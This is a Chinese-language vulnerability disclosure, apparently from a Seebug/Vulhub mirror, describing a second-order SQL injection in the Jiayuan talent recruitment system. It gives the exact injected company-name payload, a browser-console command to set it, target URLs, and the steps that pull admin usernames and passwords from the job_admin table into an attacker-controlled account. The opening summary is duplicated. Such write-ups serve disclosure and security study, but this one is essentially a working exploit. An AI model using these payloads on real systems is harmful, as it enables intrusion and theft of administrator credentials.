VULHUB ™

### 简要描述： 嘉缘人才系统1处二次注入. (demo测试) http://v2014.rccms.com/ ### 详细说明： 注册一家公司账号，发布职位，然后修改它： ``` http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018 ``` 这里我们利用的是“公司名称”，将公司名称修改为： ``` a',1,0,0x7473746162,1,0,1,concat(char(@`'`),(select(group_concat(a_user,a_pass))from job_admin)))#' ``` 其中0x7473746162为接受数据用的账号'tstab',由于有长度限制，所以这里使用5字节的账号。 面试修改页： ``` http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018 ``` 使用console修改“公司名称” ``` document.getElementById('comname').value='a\',1,0,0x7473746162,1,0,1,concat(char(@`\'`),(select(group_concat(a_user,a_pass))from job_admin)))#\''; ``` 然后发布。 [<img src="https://images.seebug.org/upload/201411/23174030620bf542aeb01f41f82c2104d1fbbdab.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23174030620bf542aeb01f41f82c2104d1fbbdab.png) 再随便找一份简历： [<img...

### 简要描述： 嘉缘人才系统1处二次注入. (demo测试) http://v2014.rccms.com/ ### 详细说明： 注册一家公司账号，发布职位，然后修改它： ``` http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018 ``` 这里我们利用的是“公司名称”，将公司名称修改为： ``` a',1,0,0x7473746162,1,0,1,concat(char(@`'`),(select(group_concat(a_user,a_pass))from job_admin)))#' ``` 其中0x7473746162为接受数据用的账号'tstab',由于有长度限制，所以这里使用5字节的账号。 面试修改页： ``` http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018 ``` 使用console修改“公司名称” ``` document.getElementById('comname').value='a\',1,0,0x7473746162,1,0,1,concat(char(@`\'`),(select(group_concat(a_user,a_pass))from job_admin)))#\''; ``` 然后发布。 [<img src="https://images.seebug.org/upload/201411/23174030620bf542aeb01f41f82c2104d1fbbdab.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23174030620bf542aeb01f41f82c2104d1fbbdab.png) 再随便找一份简历： [<img src="https://images.seebug.org/upload/201411/2317425651b06d629015066197d4b4d316b341fe.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2317425651b06d629015066197d4b4d316b341fe.png) ，发送简历邀请，选则刚才的职位test [<img src="https://images.seebug.org/upload/201411/2317431591f6bd7b399e625ef1134ce6589201cb.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2317431591f6bd7b399e625ef1134ce6589201cb.png) 提交发送，会看到SQL error [<img src="https://images.seebug.org/upload/201411/23174354199a05c65e0a22ae2a9d0789aefcea20.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23174354199a05c65e0a22ae2a9d0789aefcea20.png) 但是没关系，数据已经可以再tstab账号看到了。 使用账号tstab登录，进入会员中心=>求职管理=>收到的面试通知，可以看到刚发的面试通知， [<img src="https://images.seebug.org/upload/201411/23174501e2dff9930e8e4c1fc14247b96c5ffcaf.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23174501e2dff9930e8e4c1fc14247b96c5ffcaf.png) 进去即可以看到job_admin表的内容了： [<img src="https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png)